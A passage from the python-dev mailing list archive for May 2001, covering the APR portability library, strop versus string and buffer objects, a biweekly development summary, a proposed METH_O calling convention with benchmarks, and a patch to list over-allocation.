Amiga, PalmOS, VMS, Playstation 2(!), from looking at http://www.python.org/download/download_other.html. Cheers, M. From gstein at lyra.org Thu May 24 15:59:21 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:59:21 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100 References: <20010524055555.B5402@lyra.org> Message-ID: <20010524065921.E5402@lyra.org> On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote: > I can't think of a good way of expressing this, but I don't think we > should try to make writing non cross-platform code in Python impossible. I don't think this would preclude writing non cross-platform code. As I mentioned, there isn't anything that would prevent the stuff from working side by side. The idea is to simplify certain aspects of Python's platform specific stuff. For example: all those variants of dynamically loading shared modules (Python/dynload_*.c) can be tossed along with the config magic. > Yes, it should be easy to write x-platform code, but if there's some very > specific platform trick I can do with, say, setsockopt, I don't want > Python to hide it from me just 'cause it doesn't work on VMS. APR isn't a least common denominator approach. >... > > That doc is out of date; the list is missing: shared library handling, i18n, > > mmap, user information access (e.g. getpwnam), uuid handling, getopt > > replacements, cryptographic random data, and a few other bits here and > > there. The shared mem actually is implemented mostly, via the libmm library. > > How big is APR? That's relative :-) On my Linux box, a stripped library is 85k. It is also (theoretically) possible to skip building portions of APR. The APIs and symbols are set up for that, but the autoconf setup isn't yet. If you're embedding a private APR build, then you can fine tune what is needed. However, if you're building a public/shared one, then you wouldn't really want to trim it back like that. > How stable? The existing functionality is quite stable. We just keep adding more, though :-) > (in terms of interface; I'm assuming it > doesn't crap out through bad programming or it'd be a non-starter) hehe... you can call it a non-starter, then. APR assumes you pass it valid pointers and objects. For example, if you call apr_file_read(NULL, NULL, 100), then you'll get a segfault rather than EINVAL. Personally, I find that behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't; and this is a programmer error that needs to be attended to -- throw it in his face) Whether others think that is a non-starter... hard to know :-) [ actually, one of the hardest things to integrate would be APR's memory management approach with Python's ] > > And note that some of those topics have some nice depth. As I mentioned, > > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > > The file_io stuff support optimized stat() and opendir-type calls for the > > platform. > > > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > > > A lot more than that :-) Pretty much all the Unix variants, including > > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, > Playstation 2(!), from looking at > http://www.python.org/download/download_other.html. Sure it's smaller. It's a blue sky radical suggestion. No more, no less. :-) I mentioned it because the IPv6 stuff came up. I already know a codebase that has handled all the portability issues. That is a bonus :-) However, for the platforms that APR *does* handle today, that would still be a big code reduction for Python. And in the future? Why not extend APR to those other platforms and reduce the Python code even more. I think shifting Python to a portability library is actually quite an interesting thought experiment. Enough to mention it and get people thinking. I think it could be quite handy for the longer term maintainability. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal at lemburg.com Thu May 24 16:54:24 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 16:54:24 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <3B0D20A0.3C881F89@lemburg.com> Greg Stein wrote: > > On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > > Greg Stein wrote: > >... > > > So... my question is: is there any way that we can retain a generic find() > > > (and similar functions from the string/strop module) that operates on any > > > type that implements the buffer API? > > > > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > > implements some standard methods for 8-bit character data (using the buffer > > > API), which can be mixed into new Python types" That would reduce the burden > > > for new types. > > > > I suppose that in 2.2 we'll be able to build a class/type > > hierarchy which then provides these possibilities. I haven't > > followed Guido's latest checkins closely though -- could be that > > types don't support multiple inheritence. > > No idea either... that's why I asked. > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > You're totally missing the point with that suggestion. It does *not* suffice > to add them to buffer objects. What about array objects? mmap objects? > Random Joe Object who implements the buffer interface? That's the point: you can wrap all those into a buffer object and then use the buffer object methods to manipulate them. In that sense, buffer objects provide an adaptor to the underlying object which implements the needed methods. > All of those are out of luck. > > With strop, I can pass any of those objects to strop.find(). That function > has a polymorphic argument. > > In the current arrangement, every object must implement their own .find and > .upper and .whatever. > > Cheers, > -g > > -- > Greg Stein, http://www.lyra.org/ -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip at pobox.com Thu May 24 17:55:23 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 10:55:23 -0500 Subject: [Python-Dev] strop vs. string In-Reply-To: <20010524060016.D5402@lyra.org> References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <15117.12011.323759.496982@beluga.mojam.com> Greg> With strop, I can pass any of those objects to strop.find(). That Greg> function has a polymorphic argument. Where doesn't strop compile/run? If it works everywhere, either just rename it to be the string module (copying any bits from the existing string module that it doesn't yet have) or rename it something like buffer_funcs. Skip From skip at pobox.com Thu May 24 17:58:24 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 10:58:24 -0500 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: References: <20010524055555.B5402@lyra.org> Message-ID: <15117.12192.114564.111578@beluga.mojam.com> >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. >> >> A lot more than that :-) Pretty much all the Unix variants, including >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, Michael> VMS, Playstation 2(!), Not to mention MacOS < X... ;-) Skip From mwh at python.net Thu May 24 18:38:37 2001 From: mwh at python.net (Michael Hudson) Date: Thu, 24 May 2001 17:38:37 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24 Message-ID: This is a summary of traffic on the python-dev mailing list between May 10 and May 24 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list at python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. This is the eighth summary written by Michael Hudson. Summaries are archived at: Posting distribution (with apologies to mbm) Number of articles in summary: 322 | [|] | [|] 30 | [|] | [|] [|] [|] [|] | [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] 20 | [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 10 | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032 Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22| Fri 11 Sun 13 Tue 15 Thu 17 Sat 19 Mon 21 Wed 23 Pretty busy fortnight. The above distribution may be somewhat skewed because I changed my subscription address to python-dev and was unsubscribed for a while. Although any impact this had is probably countered by ESR and Barry's discussion of "Puffy the Frog"... * Type/class * Paul Prescod has been keeping an eye on Guido's descr-branch work, and posted concerns about when objects will have a __dict__: Then there was more technical discussion about subclassing builtin types and Steven Majewski evangelising prototype-based OO languages (though I'm not sure why!). * Easy codec access * Marc-Andre Lemburg checked in his decode string method patch, and some new codecs so you can now do things like: >>> "abc".encode('zlib').encode('base64') 'eJxLTEoGAAJNASc=\n' >>> _.decode('base64').decode('zlib') 'abc' There was a small discussion on what other codecs might be handy and Guido added quoted-printable to check it was easy. * Performance * The big discussion(s) on python-dev over the past fourteen days has centred on performance, especially on that of comparisons and the related area of dict performance. It all started with Tim Peters running a simple test program on 2.0, 2.1 and current CVS: The discussion had an unusual flavour for one about performance: a concentration on measuring performance numbers and making sure that the optimizations being discussed actually improved these numbers. This is hard; everyone wants to speed the "typical Python app" but of course there is no such thing; people have been using, amongst others, pystone, pybench and the test suite, none of which are particularly good candidates... Tim posted the distribution of sizes of dicts in a run of the test suite: which showed that small dicts are overwhelmingly the commonest. Marc piped up with an old optimization idea of his: He posted a patch to sourceforge, Tim rewrote it and checked it in, so dicts should be a little faster in 2.2. But as I said, the discussion was kicked off by the performance of comparisons, especially strings. Martin von Loewis posted some statistics from an instrumented interpreter: The issue is that the rich comparisons of Python 2.1 have added a layer of complexity to the comparisons code. Although the rich comparisons (might) provide an opportunity for faster code in some circumstances, code that still uses old-style comparisons can and does take a hit. Strings still use the old-style comparisons and are compared a *lot* (especially in dicts), so it seems "upgrading" them to rich comparisons should be a win and Marc posted a patch to sf that does this. Marc also managed to promise to make a concerted effort to find speed optimizations in the next few months: Finally, in a coda Jeremy noticed that Python spends an alarming amount of time decoding those "Oi|s#" strings that get passed to PyArg_ParseTuple: and Tim pointed out that optimizing "O" might be a win: * FP vs. tutorial * Tim pointed out that the tutorial currently contains examples of floating point output that is platform dependent, and that this is bad. He proposed changing the tutorial to only use fractions that can be exactly represented as floats, and adding a discussion (possibly in an appendix) of the reasons why >>> 0.1 0.10000000000000001 is not broken. There was a discussion of how detailed the discussion should be where the point was made that it's not really important to explain precisely *why* this happens, but it suffices to convince the newbie that floating point is more complicated than he or she thinks. Lets hope that suitable text is composed soon, and that people actually read it ... there have been two "floating point is broken" bug reports on sourceforge in just the last week. * unifying os.rename semantics across platforms * Skip pointed out that os.rename behaves differently on Posix and Windows platforms when the destination file exists: on Posix the destination is silently replaced in an atomic operation, whereas on Windows an exception is raised. Skip proposed enforcing posix semantics everywhere, but this has two problems (a) it's backwards incompatible (b) it's impossible (you can't avoid the race condition on Windows). So maybe we'll just settle for better documentation. * Python 2.1.1 * Thomas Wouters started back-porting bug fixes to the 2,1-maint branch in preparation for a 2.1.1 release. There is as yet no firm - or even vague - plans about release dates. * Daily Python-URL on your Palm * Marc-Andre Lemburg announced that you can now read Pythonware's Daily Python-URL on your Palm Pilot as an AvantGo channel: Cheers, M. From gstein at lyra.org Thu May 24 21:45:18 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 12:45:18 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <20010524124518.N5402@lyra.org> On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote: >... > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. That would certainly be a valid solution. And at the C level, we could share functions between PyBufferObject and PyStringObject. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 22:07:43 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 13:07:43 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500 References: <20010524055555.B5402@lyra.org> <15117.12192.114564.111578@beluga.mojam.com> Message-ID: <20010524130743.O5402@lyra.org> On Thu, May 24, 2001 at 10:58:24AM -0500, skip at pobox.com wrote: > > >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. > >> > >> A lot more than that :-) Pretty much all the Unix variants, including > >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, > Michael> VMS, Playstation 2(!), > > Not to mention MacOS < X... ;-) As I mentioned, MacOS X is already there. MacOS Classic is not. But the presence of a portability library such as APR does not exclude the use of direct platform hooks where/when necessary. For a bunch of stuff, you use APR [to reduce complexity/maintenance]. For the rest, you go native just like today. Cheers, -g -- Greg Stein, http://www.lyra.org/ From skip at pobox.com Thu May 24 23:15:48 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 16:15:48 -0500 Subject: [Python-Dev] Odd message from test_dbm Message-ID: <15117.31236.804746.160037@beluga.mojam.com> I just noticed this message when running make test: test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip them... Anybody else seen this? Skip From thomas at xs4all.net Thu May 24 23:42:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 23:42:58 +0200 Subject: [Python-Dev] Odd message from test_dbm In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500 References: <15117.31236.804746.160037@beluga.mojam.com> Message-ID: <20010524234258.I690@xs4all.nl> On Thu, May 24, 2001 at 04:15:48PM -0500, skip at pobox.com wrote: > I just noticed this message when running make test: > test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey > I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check > libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip > them... The problem is that the dbmmodule isn't linked to the right library. Debian has a similar (if not the same) problem. setup.py doesn't try hard enough to figure out the right library to link with; it checks for libndbm, but not libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.) I *think* all it needs to do is check for libdbm as well as libndbm, but this might pick up old/incompatible libraries on some platforms, and it might still require fiddling of include paths on others. I seem to recall you had to include either /usr/include/db1/ndbm.h (to use libdbm) or /usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm 'emulation') but I gave up in frustration trying to figure out the difference :P -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From greg at cosc.canterbury.ac.nz Fri May 25 04:45:01 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 25 May 2001 14:45:01 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com> Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). Aren't buffer objects as they're currently implemented inherently dangerous? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From martin at loewis.home.cs.tu-berlin.de Fri May 25 08:00:47 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 08:00:47 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> > Special-casing the snot out of "O" looks like a winner : I have a patch on SF that takes this approach: http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 The idea is that functions can be declared as METH_O, instead of METH_VARARGS. I also offer METH_l, but this is currently not used. The approach could be extended to other signatures, e.g. METH_O_opt_O (i.e. "O|O"). Some signatures cannot be changed into special-calls, e.g. "O!", or "ll|l". In the PyXML test suite, "O" is indeed the most frequent case (72%), and it is primarily triggered through len (26%), append (24%), and ord (6%). These are the only functions that make use of the new calling conventions at the moment. If you look at the patch, you'll see that it is quite easy to change a method to use a different calling convention (basically just remove the PyArg_ParseTuple call). To measure the patch, I use the script from time import clock indices = [1] * 20000 indices1 = indices*100 r1 = [1]*60 def doit(case): s = clock() i = 0 if case == 0: f = ord for i in indices1: f("o") elif case == 1: for i in indices: l = [] f = l.append for i in r1: f(i) elif case == 2: f = len for i in indices1: f("o") f = clock() return f - s for i in xrange(10): print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2)) Without the patch, (almost) stock CVS gives 2.190 1.800 2.240 2.200 1.800 2.220 2.200 1.800 2.230 2.220 1.800 2.220 2.200 1.800 2.220 2.200 1.790 2.240 2.200 1.790 2.230 2.200 1.800 2.220 2.200 1.800 2.240 2.200 1.790 2.230 With the patch, I get 1.440 1.330 1.460 1.420 1.350 1.440 1.430 1.340 1.430 1.510 1.350 1.460 1.440 1.360 1.470 1.460 1.330 1.450 1.430 1.330 1.420 1.440 1.340 1.440 1.430 1.340 1.430 1.410 1.340 1.450 So the speed-up is roughly 30% to 50%, depending on how much work the function has to do. Please let me know what you think. Regards, Martin From mal at lemburg.com Fri May 25 10:23:10 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:23:10 +0200 Subject: [Python-Dev] strop vs. string References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> Message-ID: <3B0E166E.581816AA@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > Aren't buffer objects as they're currently implemented > inherently dangerous? Why should they be ? -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 25 10:56:12 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:56:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <3B0E1E2C.4BC121B5@lemburg.com> "Martin v. Loewis" wrote: > > > Special-casing the snot out of "O" looks like a winner : > > I have a patch on SF that takes this approach: > > http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 > > The idea is that functions can be declared as METH_O, instead of > METH_VARARGS. I also offer METH_l, but this is currently not used. The > approach could be extended to other signatures, e.g. METH_O_opt_O > (i.e. "O|O"). Some signatures cannot be changed into special-calls, > e.g. "O!", or "ll|l". > > [benchmark] > So the speed-up is roughly 30% to 50%, depending on how much work the > function has to do. > > Please let me know what you think. Great idea, Martin. One suggestion though: I would change is the way the function is "declared" in the method list. Your currently use: {"append", (PyCFunction)listappend, METH_O, append_doc}, Now this would be more flexible if you would implement a scheme which lets us put the parser string into the method list. The call mechanism could then easily figure out how to call the method and it would also be more easily extensible: {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, This would then (just like in your patch) call the listappend function with the parser arguments inlined into the C call: listappend(self, arg0) A parser marker "OO" would then call a method like this: method(self, arg0, arg1) and so on. This approach costs a little more (the string compare), but should provide a more direct way of converting existing functions to the new convention (just copy&paste the PyArg_ParseTuple() argument) and also allows implementing a generic scheme which then again relies on PyArg_ParseTuple() to do the argument parsing, e.g. "is#" could be implemented as: PyObject *method(PyObject self, int arg0, char *arg1, int *arg1_len) For optional arguments we'd need some convention which then lets the called function add the default value as needed. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From ping at lfw.org Fri May 25 12:56:33 2001 From: ping at lfw.org (Ka-Ping Yee) Date: Fri, 25 May 2001 05:56:33 -0500 (CDT) Subject: [Python-Dev] May 25 is Towel Day (towelday.org) Message-ID: If you have enjoyed Douglas Adams' works, please consider carrying or wearing a towel with you everywhere today, May 25, as a tribute and in his memory. For more about Towel Day, visit http://www.towelday.org/. My apologies for being off-topic. -- ?!ng From gstein at lyra.org Fri May 25 13:59:23 2001 From: gstein at lyra.org (Greg Stein) Date: Fri, 25 May 2001 04:59:23 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200 References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com> Message-ID: <20010525045923.C12056@lyra.org> On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote: > Greg Ewing wrote: > > "M.-A. Lemburg" : > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > Aren't buffer objects as they're currently implemented > > inherently dangerous? > > Why should they be ? The buffer object caches the pointer from getreadbuffer and friends. If the target object changes that pointer (internally), then the buffer object's value is stale. But that is a bug fix; it is independent of the discussion at hand. Cheers, -g -- Greg Stein, http://www.lyra.org/ From Barrett at stsci.edu Fri May 25 15:21:20 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Fri, 25 May 2001 09:21:20 -0400 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <3B0E5C50.6E365F69@STScI.Edu> "M.-A. Lemburg" wrote: > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. Sounds like you are trying to make the buffer object into something it is not. Not that I have the foggiest idea what it is now, since it hasn't much use and is badly broken. I like your idea of sharing functions, I just don't think the buffer object is the proper means. I think the buffer object should be removed from Python and something better put in its place. (I'm not talking about the buffer C/API, though this could also use an overhaul, since it doesn't provide enough information to the receiving method.) What I think we need is: 1) a malloc object which has a similar interface to the mmap object with access protection, etc. This object would be the fundamental way of getting memory. The string object would use it to allocate a chunk of 'read-only' memory. Other objects would then know not to modify the contents of the memory. If you wanted a reference or view of the memory/buffer, you would get a reference to this object. 2) objects supporting the buffer object should provide a view method which returns a copy of themselves (and hence all their methods) and can be used to get a pointer to a subset of its memory. In this way the type of memory/buffer being accessed is known compared to the current buffer object which only indicates the buffer is binary or char data. In essence information about how the buffer should be used is lost in the current buffer C/API. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From guido at digicool.com Fri May 25 16:29:28 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 25 May 2001 10:29:28 -0400 Subject: [Python-Dev] Vacation Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com> I will be on vacation next week without net access. Back on June 4th! There's a bunch of stuff that happened on the mailing list that I expect I won't get to -- I've got to finish up some high priority work for Digital Creations before I can leave. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 25 21:06:16 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 25 May 2001 15:06:16 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: c.l.py has rediscovered the quadratic-time worst-case behavior of list.append(). That is, do list.append(x) in a long loop. Linux users don't see anything particularly bad no matter how big the loop. WinNT eventually displays clear quadratic-time behavior. Win9x dies surprisingly early with a MemoryError, despite gobs of memory free: turns out Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the whole 2GB user space gets fragmented beyond hope). People on other platforms have reported other bad behaviors over the years. I don't want to argue about this again , I just want to know whether the patch below slows anything down on your oddball box. It increases the over-allocation amount in several more layers. Also replaces integer * and / in the over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes). Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. Index: Objects/listobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v retrieving revision 2.92 diff -c -r2.92 listobject.c *** Objects/listobject.c 2001/02/12 22:06:02 2.92 --- Objects/listobject.c 2001/05/25 19:04:07 *************** *** 9,24 **** #include /* For size_t */ #endif ! #define ROUNDUP(n, PyTryBlock) \ ! ((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock)) static int roundupsize(int n) { ! if (n < 500) return ROUNDUP(n, 10); else ! return ROUNDUP(n, 100); } #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems)) --- 9,30 ---- #include /* For size_t */ #endif ! #define ROUNDUP(n, nbits) \ ! ( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) ) static int roundupsize(int n) { ! if ((n >> 9) == 0) ! return ROUNDUP(n, 3); ! else if ((n >> 13) == 0) ! return ROUNDUP(n, 7); ! else if ((n >> 17) == 0) return ROUNDUP(n, 10); + else if ((n >> 20) == 0) + return ROUNDUP(n, 13); else ! return ROUNDUP(n, 18); } #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems)) From martin at loewis.home.cs.tu-berlin.de Fri May 25 21:51:26 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 21:51:26 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> > Now this would be more flexible if you would implement a scheme > which lets us put the parser string into the method list. The > call mechanism could then easily figure out how to call the > method and it would also be more easily extensible: > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, I'd like to hear other people's comment on this specific issue, so I guess I should probably write a PEP outlining the options. My immediate reaction to your proposal is that it only complicates the interface without any savings. We still can only support a limited number of calling conventions. E.g. it is not possible to write portable C code that does all the calling conventions for "l", "ll", "lll", "llll", and so on - you have to cast the function pointer to the right prototype, which must be done in source code. So with this interface, you may end up at run-time finding out that you cannot support the signature. With the current patch, you'd have to know to convert "OO" into METH_OO, which I think is not asked too much - and it gives you a compile-time error if you use an unsupported calling convention. > A parser marker "OO" would then call a method like this: > > method(self, arg0, arg1) > > and so on. That is indeed the plan, but since you have to code the parameter combinations in C code, you can only support so many of them. > allows implementing a generic scheme which > then again relies on PyArg_ParseTuple() to do the argument > parsing, e.g. "is#" could be implemented as: The point of the patch is to get rid of PyArg_ParseTuple in the "common case". For functions with complex calling conventions, getting rid of the PyArg_ParseTuple string parsing is not that important, since they are expensive, anyway (not that "is#" couldn't be supported, I'd call it METH_is_hash). > For optional arguments we'd need some convention which then > lets the called function add the default value as needed. For the moment, I'd only support "|O", and perhaps "|z"; an omitted argument would be represented as a NULL pointer. That means that "|i" couldn't participate in the fast calling convention - unless we translate that to void foo(PyObject*self, int i, bool ipresent); BTW, the most frequent function in my measurements that would make use of this convention is "OO|i:replace", which scores at 4.5%. Regards, Martin From gstein at lyra.org Fri May 25 22:27:52 2001 From: gstein at lyra.org (Greg Stein) Date: Fri, 25 May 2001 13:27:52 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> Message-ID: <20010525132752.B5402@lyra.org> On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote: > "M.-A. Lemburg" wrote: > > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > > Then you could write: buffer(ob).find('.'). > > > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > > > That's the point: you can wrap all those into a buffer object > > and then use the buffer object methods to manipulate them. In > > that sense, buffer objects provide an adaptor to the underlying > > object which implements the needed methods. > > Sounds like you are trying to make the buffer object into something it > is not. The buffer object is intended to provide a Python-level object (with methods and behavior) for any other object which exports the buffer API (but not those particular methods/behavior). It was added for Python 1.5.2, but did not keep up with the methods added to the string object. Arguably, it is out of date rather than "[turning it into] something it is not." > Not that I have the foggiest idea what it is now, since it > hasn't much use and is badly broken. "badly" is overstating the problem. It caches a pointer when it shouldn't. This doesn't work well when using it with array objects or PIL's image objects. Most objects, it is fine. The buffer object is also very good for C/Python extensions and embedding code. It provides a Python-level view on a block of memory. Using a string object implies making a copy, and it removes the possibility for read/write access to that memory. And you state: "Not that I have the foggiest idea what it is now". If so, then wtf are you making statements about the buffer object's behavior? > I like your idea of sharing functions, I just don't think the buffer > object is the proper means. I think the buffer object should be > removed from Python and something better put in its place. (I'm not > talking about the buffer C/API, though this could also use an > overhaul, since it doesn't provide enough information to the receiving > method.) > > What I think we need is: > > 1) a malloc object which has a similar interface to the mmap object > with access protection, etc. This object would be the fundamental way > of getting memory. The string object would use it to allocate a chunk > of 'read-only' memory. Other objects would then know not to modify > the contents of the memory. If you 